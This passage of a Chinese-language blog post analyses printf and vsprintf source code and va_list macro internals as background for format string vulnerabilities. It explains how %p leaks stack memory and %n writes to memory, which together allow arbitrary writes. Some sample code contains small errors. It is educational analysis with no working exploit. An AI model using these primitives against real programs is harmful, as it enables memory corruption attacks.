class="number">0</span>)</span><br><span class="line">                precision=len;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(len&gt;precision)</span><br><span class="line">                len=precision;</span><br><span class="line">            <span class="keyword">if</span>(!(flags&amp;LEFT))</span><br><span class="line">                <span class="keyword">while</span>(len&lt;field_width--)</span><br><span class="line">                    *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            <span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;len;++i)</span><br><span class="line">                *str++=*s++;</span><br><span class="line">            <span class="keyword">while</span>(len&lt;field_width--)</span><br><span class="line">                *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;o&#x27;</span>: </span><br><span class="line">                str=number(str,va_arg(args,<span class="keyword">unsigned</span> <span class="keyword">long</span>),<span class="number">8</span>,field_width,precision,flags);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;p&#x27;</span>:</span><br><span class="line">            <span class="keyword">if</span>(field_width==<span class="number">-1</span>)&#123;</span><br><span class="line">                field_width=<span class="number">0</span>;</span><br><span class="line">                flags|=ZEROPAD;</span><br><span class="line">            &#125;</span><br><span class="line">            str=number(str,(<span class="keyword">unsigned</span> <span class="keyword">long</span>)va_arg(args,<span class="keyword">void</span>*),<span class="number">16</span>,field_width,precision,flags);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;x&#x27;</span>:</span><br><span class="line">            flags|=SMALL;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;X&#x27;</span>:</span><br><span class="line">            str=number(str,va_arg(args,<span class="keyword">unsigned</span> <span class="keyword">long</span>),<span class="number">16</span>,field_width,precision,flags);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;d&#x27;</span>:</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;i&#x27;</span>:</span><br><span class="line">            flags|=SIGN;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;u&#x27;</span>:</span><br><span class="line">            str=number(str,va_arg(args,<span class="keyword">unsigned</span></span><br><span class="line"><span class="keyword">long</span>),<span class="number">10</span>,field_width,precision,flags);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;n&#x27;</span>:</span><br><span class="line">            ip=va_arg(args,<span class="keyword">int</span> *);</span><br><span class="line">            *ip=(str-buf);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">default</span>:</span><br><span class="line">            <span class="keyword">if</span>(*fmt!=<span class="string">&#x27;%&#x27;</span>)</span><br><span class="line">                *str++=<span class="string">&#x27;%&#x27;</span>;</span><br><span class="line">            <span class="keyword">if</span>(*fmt)</span><br><span class="line">                *str++=*fmt;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                --fmt;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    *str=<span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> str-buf;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">可变函数在内部实现的过程中是从右向左压入堆栈，从而保证了可变参数的第一个参数始终位于栈顶</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">println</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *fmt,...)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    va_list args;<span class="comment">//定义一个char类型的指针</span></span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    va_start(args,fmt);</span><br><span class="line">    <span class="comment">//实际上可以理解为(char *)&amp;fmt+4指向了第一个参数（char*)&amp;fmt+8指向了第二个参数</span></span><br><span class="line">    write(STDOUT,printbuf,i=<span class="built_in">vsprintf</span>(printbuf,fmt,args));</span><br><span class="line">    <span class="comment">//将printbuf里的值写入标准输出</span></span><br><span class="line">    va_end(args);<span class="comment">//关闭函数参数列表，将参数置空（即args=NULL）</span></span><br><span class="line">    <span class="keyword">return</span> i;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>伪代码：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdarg.h&gt;</span></span></span><br><span class="line"> </span><br><span class="line"><span class="comment">//va_start(arg,fmt),初始化参数指针arg，将函数参数fmt右边第一个参数地址赋值给arg</span></span><br><span class="line"><span class="comment">//fmt必须是一个参数的指针，所以，此种类型函数至少要有一个普通的参数</span></span><br><span class="line"><span class="comment">//从而提供给va_start ,这样va_start才能找到可变参数在栈上的位置</span></span><br><span class="line"><span class="comment">//va_arg(arg,char),获得arg指向参数的值，同时使arg指向下一个参数,char用来指名当前参数型</span></span><br><span class="line"><span class="comment">//va_end 在有些实现中可能会把arg改成无效值，这里，是把arg指针指向了 NULL,避免出现野指针 </span></span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">print</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *fmt, ...)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	va_list arg;</span><br><span class="line">	va_start(arg, fmt);</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">while</span> (*format)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">char</span> ret = *fmt;</span><br><span class="line">		<span class="keyword">if</span> (ret == <span class="string">&#x27;%&#x27;</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">switch</span> (*++fmt)</span><br><span class="line">			&#123;</span><br><span class="line">			<span class="keyword">case</span> <span class="string">&#x27;c&#x27;</span>:</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="keyword">char</span> ch = va_arg(arg, <span class="keyword">char</span>);</span><br><span class="line">				<span class="built_in">putchar</span>(ch);</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="keyword">char</span> *pc = va_arg(arg, <span class="keyword">char</span> *);</span><br><span class="line">				<span class="keyword">while</span> (*pc)</span><br><span class="line">				&#123;</span><br><span class="line">					<span class="built_in">putchar</span>(*pc);</span><br><span class="line">					pc++;</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">default</span>:</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">putchar</span>(*fmt);</span><br><span class="line">		&#125;</span><br><span class="line">		fmt++;</span><br><span class="line">	&#125;</span><br><span class="line">	va_end(arg);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>printf源码</strong>太复杂，但是网上有大佬把其中<strong>关键</strong>的部分提取了出来，编写出了相对简单的<strong>伪代码</strong></p>
<p>“printf”的<strong>执行过程</strong>主要依靠<strong>1个指针</strong>，<strong>3个函数</strong></p>
<p>指针：val_list arg</p>
<p>函数：va_start(arg, fmt)，va_arg(arg, type)，va_end(arg)</p>
<p>主要流程如下：</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639554313034.png" class width="1639554313034"> 
<p>根据流程，可以大致分析漏洞的成因了：</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639503859877.png" class width="1639503859877"> 
<p>假设正常的printf有3个变量：val1，val2，val3</p>
<p>它们所指向的内容分别为：buf1，buf2，buf3</p>
<p>正常的printf有3个变量在函数调用的过程中是会<strong>正常压栈</strong>的（如上图）</p>
<p>格式化参数中的3个“%”会调用3次“va_arg”函数，并且都<strong>只会</strong>对<strong>压在栈上</strong>的这3个参数进行操作</p>
<p>如果printf没有这3个参数，<strong>arg</strong>就会把栈中<strong>对应位置</strong>的内容<strong>错误识别</strong>为参数</p>
<p>因此这3个“va_arg”函数就会对<strong>对应位置</strong>的地址空间进行操作</p>
<p>格式化字符串漏洞，就是利用了<strong>arg</strong>的特性，使用“%p”获取<strong>指针类型</strong>来泄露地址</p>
<p>这就引发了一个问题：</p>
<p>函数va_start，va_arg，va_end中的<strong>参数</strong>都是一样的(<strong>arg</strong>)，为什么<strong>指向内容</strong>会变化呢？</p>
<p>并且<strong>arg</strong>似乎知道<strong>“格式化参数”</strong>的长度，可以准确指向其后的下一个变量</p>
<p>想要知道<strong>arg</strong>的成因，需要先有C语言<strong>宏</strong>的知识</p>
<hr>
<p><strong>宏</strong></p>
<p>宏是一种批量处理的称谓，计算机科学里的宏是一种<strong>抽象</strong> </p>
<p>即使用“标识符”来表示“替换列表”中的内容</p>
<p><strong>宏定义</strong></p>
<p>格式为：“#define 标识符 <strong>替换列表</strong>”</p>
<p>在预处理过程中，预处理器会把<strong>源程序</strong>中所有宏名，替换成<strong>宏定义</strong>中<strong>替换列表</strong>中的内容 </p>
<p><strong>宏函数</strong></p>
<p>格式为：“#define MAX(a,b) ((a)&lt;(b)?(b):(a))”（MAX为函数，其后为函数的内容）</p>
<p>案例：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> sqr(x) ((x)*(x))</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc,<span class="keyword">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> n;</span><br><span class="line">    <span class="keyword">double</span> x;</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;请输入一个整数：\n&quot;</span>);</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;n);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d的平方是：%d\n&quot;</span>,n,sqr(n));</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;请输入一个实数：\n&quot;</span>);</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%lf&quot;</span>,&amp;n);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%lf的平方是：%lf\n&quot;</span>,n,sqr(n));</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里可以发现：</p>
<p>int 类型(%d)和 double 类型(%lf) 都可以被<strong>宏函数</strong>“sqr(n)”计算</p>
<p>“sqr(n)”本身的参数“n”<strong>没有定义类型</strong>，并且“n”可以接受<strong>任何合理的类型</strong>的数据</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/wit_732/article/details/106602503">https://blog.csdn.net/wit_732/article/details/106602503</a></p>
<p><strong>PS：“&amp;”脱去解引用</strong></p>
<p>我们都熟悉“&amp;”，知道它有获取变量地址的能力，但先看一个例子：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;stdio.h&quot;</span> </span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span> </span></span><br><span class="line"><span class="function"></span>&#123;     </span><br><span class="line">    <span class="keyword">int</span> a = <span class="number">0</span>; <span class="comment">//&amp;a = 0x0012ff60   </span></span><br><span class="line">    <span class="keyword">int</span> *p = &amp;*(<span class="keyword">int</span>*)<span class="number">0x0012ff60</span>;     </span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;The value is: %d/n&quot;</span>, *p);     </span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>已知变量“a”的地址就是“0x0012ff60”，把“0x0012ff60”转换为(int<em>)类型，这时它和“&amp;a”是<em>*等价</em></em>的</p>
<p>“(int<em>)0x0012ff60 == &amp;a(变量a的<strong>地址</strong>)”，在其前面加上“ </em> ”，就代表变量a的<strong>内容</strong>（解引用）</p>
<p>最后在其前面加上“&amp;”，表示<strong>脱去解引用</strong> ，“&amp;<em>(int </em>)0x0012ff60 == &amp;a”</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/zenny_chen/article/details/2512056">https://blog.csdn.net/zenny_chen/article/details/2512056</a></p>
<p><strong>PS：C语言中的“逗号”</strong></p>
<p>C语言中的逗号有两种意思：</p>
<p>1、表示”分隔号”的意思,就和语文中的逗号一个意思</p>
<p>2、表示”逗号运算符”的意思,用它将多个表达式连接起来：</p>
<p>先对左侧表达式求值，将结果丢弃，逗号运算符的真正结果是右侧表达式的值 </p>
<p>例如：“a = 3+5 , 6+8 ”（ 逗号表达式 ）</p>
<p>结果：“a = 14 ”</p>
<hr>
<h2 id="分析printf中的宏定义（32位）"><a href="#分析printf中的宏定义（32位）" class="headerlink" title="分析printf中的宏定义（32位）"></a>分析printf中的宏定义（32位）</h2><p>​        //64位的宏定义与32位有些许不同，后文会提到</p>
<p>我们的目的是了解为什么<strong>arg</strong>会<strong>自动获取</strong>下一个参数的位置，那么先看看<strong>arg</strong>是怎么来的</p>
<p>“va_list arg”中声明了arg</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">char</span> *va_list;</span><br></pre></td></tr></table></figure>
<p>“typedef”为<strong>重定义</strong>，把“char *”重新命名为“va_list”，这里就是定义了一个char类型的指针</p>
<p>其后的：va_start，va_arg，va_end都是<strong>宏函数</strong>，arg作为它们的参数</p>
<p>而它们都属于<strong>VA_LIST</strong>：</p>
<p>VA_LIST 是在C语言中解决<strong>变参问题</strong>的<strong>一组宏</strong>（变参问题：参数的个数不定，类型也可以不同）</p>
<p>VA_LIST的用法： </p>
<p>1.首先在函数里定义一具<strong>VA_LIST</strong>型的变量，这个变量是指向参数的指针<br>2.然后用<strong>VA_START</strong>宏初始化变量刚定义的VA_LIST变量<br>3.然后用<strong>VA_ARG</strong>返回可变的参数，<strong>VA_ARG</strong>的第二个参数是你要返回的参数的类型<br>4.最后用<strong>VA_END</strong>宏结束可变参数的获取</p>
<p>为了理解这些<strong>宏函数</strong>（<strong>VA_LIST</strong>），先看一个案例：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span><span class="params">(<span class="keyword">char</span> *param1，<span class="keyword">char</span> *param2，<span class="keyword">char</span> *param3, <span class="keyword">char</span> *param4)</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    va_list <span class="built_in">list</span>;</span><br><span class="line">    va_start(<span class="built_in">list</span>,param1);</span><br><span class="line">    va_arg(<span class="built_in">list</span>, <span class="keyword">char</span>);</span><br><span class="line">    <span class="keyword">return</span>; </span><br><span class="line">&#125;<span class="comment">//宏定义过程省略</span></span><br></pre></td></tr></table></figure>
<p>调用函数test，参数从右往左依次入栈，然后压上“返回地址”和“EBP”：</p>
<p><img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639559618139.png" width="250" height="325">  </p>
<p>调用函数 <strong>va_start(list,param1)</strong> 后：</p>
<p><img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639559874868.png" width="375" height="355">  </p>
<p>调用函数 <strong>va_arg(list, char)</strong> 后：</p>
<p><img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639560186765.png" width="375" height="355">  </p>
<p>结合“以上案例”和“以下宏函数的源码”，我们可以大致分析一下这些宏函数了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_round_size(TYPE) </span></span><br><span class="line">(((<span class="keyword">sizeof</span>(TYPE)+<span class="keyword">sizeof</span>(<span class="keyword">int</span>)<span class="number">-1</span>)/<span class="keyword">sizeof</span>(<span class="keyword">int</span>))*<span class="keyword">sizeof</span>(<span class="keyword">int</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_start(AP,LASTARG)<span class="comment">//va_start</span></span></span><br><span class="line">(AP=((<span class="keyword">char</span> *)&amp;(LASTARG)+va_round_size(LASTARG)))</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_arg(AP,TYPE)<span class="comment">//va_arg</span></span></span><br><span class="line">(AP+=va_round_size(TYPE),*((TYPE*)(AP-va_round_size(TYPE)))) </span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> va_end(AP)<span class="comment">//va_end</span></span></span><br><span class="line">(ap=(va_list)<span class="number">0</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment">//以上操作中的sizeof(int)只是32位的情况，如果是64位，则变为sizeof(int64)</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//针对TYPE为一个类型名的情况</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _sizeof_type(TYPE) (size_t)((TYPE*)0 + 1)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//针对TYPE为一个变量或者数组名的情况</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _sizeof(TYPE) ((size_t)(&amp;TYPE + 1) - (size_t)(&amp;TYPE))</span></span><br></pre></td></tr></table></figure>
<p><strong>“sizeof”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">((<span class="keyword">size_t</span>)(&amp;TYPE + <span class="number">1</span>) - (<span class="keyword">size_t</span>)(&amp;TYPE))</span><br></pre></td></tr></table></figure>
<p><strong>“&amp;TYPE + 1”</strong>无非是一个很奇妙的东西，这个简单的“+1”操作<strong>并不是</strong>在“&amp;TYPE”的基础上加1字节</p>
<p>它的实际增加值会随着<strong>“TYPE”类型的变化</strong>而变化</p>
<p>​        //比如：“TYPE”为int类型，“+1”的实际值为“+4”，“TYPE”为double类型”，“+1”的实际值为“+8”</p>
<p>为什么会有这样的结果呢？</p>
<p>每一个变量标识符在<strong>编译期间</strong>，编译器会为它们创建一个<strong>符号表</strong>，其中存放着变量标识符相应的各种属性，如类型、地址标识等</p>
<p>“+1”代表了增加<strong>1个单位</strong>，具体的字节数是根据<strong>符号表</strong>计算得来的</p>
<p>​        //这一点在<strong>数组</strong>中很有用，比如对int类型的数组进行“+1”操作，实际上地址加了“4”</p>
<p>所以不管是什么类型（包括数组），sizeof都可以获取它的<strong>“长度”</strong></p>
<p><strong>“va_round_size”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(((<span class="keyword">sizeof</span>(TYPE)+<span class="keyword">sizeof</span>(<span class="keyword">int</span>)<span class="number">-1</span>)/<span class="keyword">sizeof</span>(<span class="keyword">int</span>))*<span class="keyword">sizeof</span>(<span class="keyword">int</span>))</span><br></pre></td></tr></table></figure>
<p>简单翻译一下就是：“ (len(TYPE)+3) / 4 * 4 ”</p>
<p>1.整除4，然后乘4的操作，可以保证结果为<strong>4的倍数</strong>（只退不进）</p>
<p>2.“+3”则保证了结果<strong>最小为4</strong>（sizeof(TYPE)最小为“1”）</p>
<p>那么整个“va_round_size”就是为了<strong>获取“TYPE类型”的长度</strong>，并把结果保存为<strong>4的倍数</strong></p>
<p>​        //在64位的系统中，sizeof(int)变为sizeof(int64)，所以结果保存为<strong>8的倍数</strong>，且<strong>最小为8</strong></p>
<p><strong>“va_start”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(AP=((<span class="keyword">char</span> *)&amp;(LASTARG)+va_round_size(LASTARG)))</span><br></pre></td></tr></table></figure>
<p>根据上文对“va_round_size”的分析：AP = “LASTARG”的地址 + “LASTARG”的长度</p>
<p>“LASTARG”就相当于案例中的“param1”，第一个参数，格式化参数</p>
<p>而格式化参数通常是一个字符串，所以“LASTARG”是一个数组</p>
<p>“va_start”的意义就在于：把<strong>AP</strong>赋值为“LASTARG”结束后的下一个地址</p>
<p>这个也不难理解：</p>
<p><img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639593048830-1639628397565.png" width="400" height="325">   </p>
<p>“LASTARG”的长度为<strong>4的倍数</strong>且<strong>最小为4</strong>，保证AP<strong>至少</strong>可以指向下一个地址空间</p>
<p>有时候<strong>“格式化参数”</strong>会比较长，可以占用好几个地址空间，这样设计就可以保证<strong>指针list</strong>指向<strong>“val1”</strong></p>
<p><strong>“va_arg”：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">AP+=va_round_size(TYPE)//TYPE通常是指针类型，长度固定为‘一个字’</span><br><span class="line">*((TYPE*)(AP-va_round_size(TYPE)))</span><br></pre></td></tr></table></figure>
<p>进行“AP+va_round_size(TYPE)”操作，让<strong>AP</strong>加上“TYPE”的长度，使其指向下一个<strong>“val”</strong></p>
<p>“AP-va_round_size(TYPE)”就是它<strong>原本指向</strong>的变量“val”的地址</p>
<p>然后将其转化为“TYPE <em> ”类型，此时 “(TYPE </em>)(AP-va_round_size(TYPE))”就相当于“&amp;val”</p>
<p>“va_arg”实现了当前“val”的<strong>强制类型转换</strong>，并且使<strong>AP</strong>指向了下一个“val”</p>
<p><strong>“va_end”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(ap=(va_list)<span class="number">0</span>) </span><br></pre></td></tr></table></figure>
<p>之前“char<em> ”被<strong>重定位</strong>成“va_list”，所以“va_list”就等同于“char</em> ”</p>
<p>“va_end”就相当于把<strong>AP</strong>指针置空了</p>
<p>参考博客： </p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/f110300641/article/details/83822290">https://blog.csdn.net/f110300641/article/details/83822290</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/u013812502/article/details/81198452">https://blog.csdn.net/u013812502/article/details/81198452</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/hyb612/article/details/102598233">https://blog.csdn.net/hyb612/article/details/102598233</a></p>
<p>通过上述分析，我们已经认识了“printf”的执行过程，明白了它是如何<strong>获取参数</strong>，<strong>打印参数</strong>的</p>
<p>也了解了用于处理<strong>变参问题</strong>的一组宏定义：<strong>VA_LIST</strong>，分析了它的运行原理</p>
<p>接着就是分析格式化字符串中，两个重要<strong>控制符</strong>了：“%p”，“%n”</p>
<hr>
<h2 id="分析printf的控制符"><a href="#分析printf的控制符" class="headerlink" title="分析printf的控制符"></a>分析printf的控制符</h2><p>伪造控制符，这是格式化漏洞的核心</p>
<p>用“%p”可以泄露内存数据，用“%n”可以改写地址空间的内容</p>
<p>两者结合，就可以做到<strong>WriteAnythingAnywhere</strong></p>
<p><strong>“%p”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&#x27;p&#x27;</span>:</span><br><span class="line"><span class="keyword">if</span>(field_width==<span class="number">-1</span>)</span><br><span class="line">&#123;</span><br><span class="line">    field_width=<span class="number">0</span>;</span><br><span class="line">    flags|=ZEROPAD;<span class="comment">//#define ZEROPAD 1</span></span><br><span class="line">&#125;</span><br><span class="line">str=number(str,(<span class="keyword">unsigned</span> <span class="keyword">long</span>)va_arg(args,<span class="keyword">void</span>*),<span class="number">16</span>,field_width,precision,flags);</span><br><span class="line"><span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>
<p>整个printf函数只有一个地方有“field_width= -1”</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">field_width=<span class="number">-1</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">isdigit</span>(*fmt))</span><br><span class="line">    field_width=getFieldWidth(&amp;fmt);<span class="comment">//获取域宽</span></span><br></pre></td></tr></table></figure>
<p>“field_width”被赋值“-1”后，只要符合if条件，它马上就会被重新覆盖</p>
<p>经过一些操作后：“field_width=0”，“precision=-1”，“flags=1”</p>
<p>进入函数“number”：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">char</span> *<span class="title">number</span><span class="params">(<span class="keyword">char</span> *str,<span class="keyword">int</span> num,<span class="keyword">int</span> base,<span class="keyword">int</span> size,<span class="keyword">int</span> precision,<span class="keyword">int</span> type)</span></span></span><br><span class="line"><span class="function"></span>&#123;<span class="comment">//实参为：str，va_arg(args,void*)，16，field_width，precision，flags</span></span><br><span class="line">    <span class="keyword">char</span> c,sign,tmp[<span class="number">36</span>];</span><br><span class="line">    <span class="keyword">const</span> <span 